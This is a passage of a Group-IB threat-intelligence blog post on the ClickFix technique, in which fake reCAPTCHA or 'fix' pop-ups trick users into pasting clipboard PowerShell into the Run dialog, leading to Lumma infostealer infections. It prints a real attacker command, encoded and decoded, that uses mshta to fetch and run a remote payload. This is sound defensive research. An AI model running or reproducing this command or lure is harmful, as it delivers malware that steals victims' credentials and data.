ClickFix: The Social Engineering Technique Hackers Use to Manipulate Victims Archived: 2026-05-05 02:15:17 UTC Introduction Since August 2024, the Group-IB Threat Intelligence (TI) team has researched and actively monitored the ClickFix technique in the wild. This technique has gained significant traction and widespread adoption among threat actors due to its surprising effectiveness. It is tracked by cybersecurity researchers and firms under the names ClickFix and ClearFix. The TI team at Group-IB has analyzed various infection chains and variants of this technique, as well as the different operations that have employed it. Based on our analysis, we have developed detection signatures for identifying ClickFix websites in the wild. Our systems continue to detect and track numerous instances of these sites, with thousands being already added to our database at the time of compiling this report. At its core, the ClickFix infection chain operates by deceiving users into taking an action to “fix” a non-existent issue by either automatically or manually copying and pasting a malicious command into their terminal or Run dialog. Pop-ups are shown with dialog requiring the user to press on buttons like “Fix It” or “I am not a robot”, as just a couple of examples observed. Once clicked, a malicious powershell script is automatically copied to the user’s clipboard. Users are then deceived into pasting the script into the RUN dialog after pressing Windows key + R, thereby executing the malware without their knowledge. This technique facilitates the infection process, enabling attackers to deploy the malware with direct help of users. When users click the button on these webpages, a malicious PowerShell script is copied to their clipboard, and additional instructions are displayed to prompt execution. The website uses JavaScript to automatically copy the script without any user interaction. Notably, the method capitalizes on human behavior: by presenting a plausible “solution” to a perceived problem, attackers shift the burden of execution onto the user, effectively sidestepping many automated defenses. This technique has been adopted by many cybercriminals, and even APT groups to lure their victims and infect them with their desired malware. This blog post explores the ClickFix technique within the infostealer ecosystem, showcasing real-world examples. We will highlight an incident detected by Group-IB MXDR before the technique became public and provide examples of APT groups using ClickFix as well. Additionally, we will offer recommendations for mitigating this threat for organizations and individuals. Key discoveries in the blog ClickFix is a social engineering technique that tricks users into executing malicious PowerShell commands which are automatically copied to their clipboard. First observed in October 2023, with significant global adoption by late 2024. Fake reCAPTCHA pages and bot protection prompts are the most common disguises. Lumma is the most frequently distributed infostealer in the analyzed campaigns. Nation-state-sponsored APT groups also adopted this technique due to its effectiveness. ClickFix and the Infostealer Ecosystem Understanding the mechanisms behind malware distribution is essential for identifying and disrupting potential threats before they even happen. The ClickFix technique has emerged as a vector for delivering infostealer malware in late 2024. This section will explore how threat actors use ClickFix to compromise their victims. Infostealer malware is designed to exfiltrate sensitive data from compromised devices. This includes a wide variety of information such as usernames, passwords, cookies, cryptocurrency wallet information, and other confidential documents. Infostealers as any other type of malware can be distributed through a variety of means, but the ClickFix technique has recently become one of the most popular methods used to trick the victims into installing it. How the ClickFix trick works: ClickFix is a social engineering technique that involves tricking the victim into believing that a legitimate action is required to proceed. This often manifests as an “Update”, “Fix”, or “Bot verification” prompt that https://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/ Page 1 of 22 appears when a user interacts with the site. The victim follows the instructions in the prompt which is basically to open the windows RUN dialog and press Ctrl+V which will paste clipboard contents and cause malicious code to be executed on their machine. As a result, malware payload is delivered, and the victim’s machine is compromised. Figure 1. ClickFix malware infection chain. We’ve observed that the majority of campaigns aim to deliver infostealers, which, once installed, collect sensitive information from the victim’s system and send it back to the attacker behind the operation. Key methods employed by threat actors to generate leads to ClickFix pages: During the analysis of ClickFix killchains in the wild, the following methods were observed: 1. Spearphishing and Social Engineering: Threat actors use spearphishing emails or messages (via chat apps or SMS) to lure users into clicking on malicious links. This can be done both in an opportunistic manner, or by engaging with targets directly with a tailored social engineering scheme. 2. Malicious Advertising (Malvertising): Ads on legitimate websites are often hijacked to display malicious popups or redirect users to phishing sites. 3. Phishing Websites (SEO poisoning): Malicious sites that mimic legitimate services (e.g., video streaming or tools) can be SEO-optimized to appear high in search results, attracting unsuspecting visitors. 4. Compromised Legitimate Websites: Threat actors exploit vulnerable or poorly secured websites to inject malicious plugins or code into them, which will impact the visitors of such sites. 5. Social Media Spam: Threat actors engage in spamming forums, social media platforms, or comments sections to promote fake opportunities that lead to malware. Once victims land on the malicious page by any of the above methods, the ClickFix technique will be used to trick them into executing the malicious payload which is usually an infostealing malware. Figure 2. Malware lifecycle utilizing ClickFix for delivery. An Early Incident Detected by GROUP-IB MXDR https://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/ Page 2 of 22 Overview In August 2024 GROUP-IB Incident Response team detected a technique being utilized on a campaign targeting Windows systems. It employs websites to present fake reCAPTCHA forms to deceive users into executing a chain of obfuscated Powershell Commands which leads to a final downloader deploying Lumma C2 info-stealer (See Figure 3). GROUP-IB named this final downloader SMOKESABER. Figure 3. Overall chain of execution of the detected incident. Incident Details Initial Access The attacker starts by constructing a malicious URL belonging to a hijacked domain that points the user to a fake reCAPTCHA page (See Figure 4). Once the user clicks on “I’m not a robot button” the embedded script in the HTML page commands the browser to copy a malicious PowerShell command to the user clipboard. Then a popup instructs the user to open Windows Run Dialogue Box and paste the malicious command to execute it (See Figure 5). Figure 4. Fake reCAPTCHA page. https://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/ Page 3 of 22 Figure 5. Popup instructing the victim to run the malicious command. The base64 encoded PowerShell command downloads a portable executable that includes an HTA application that runs an obfuscated javascript loader. Encoded powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AZwBlAHQAeQBvAHUAcgBwAGEAZwBlAHMALgBjAG8AbQAvAGQ Decoded Powershell.exe -eC mshta “https://getyourpages.com/downloads/brv” Javascript Loader Following the initial access PowerShell command, utilizing “C:\Windows\System32\mshta.exe” to execute the javascript embedded in the HTA application (See Figure 6). Figure 6. First stage of the Javascript loader. The file that is given to mshta utility is a Windows binary, having JS scripts appended as the overlay. Without the overlay appended, the file is a clean Windows binary. The mshta utility finds the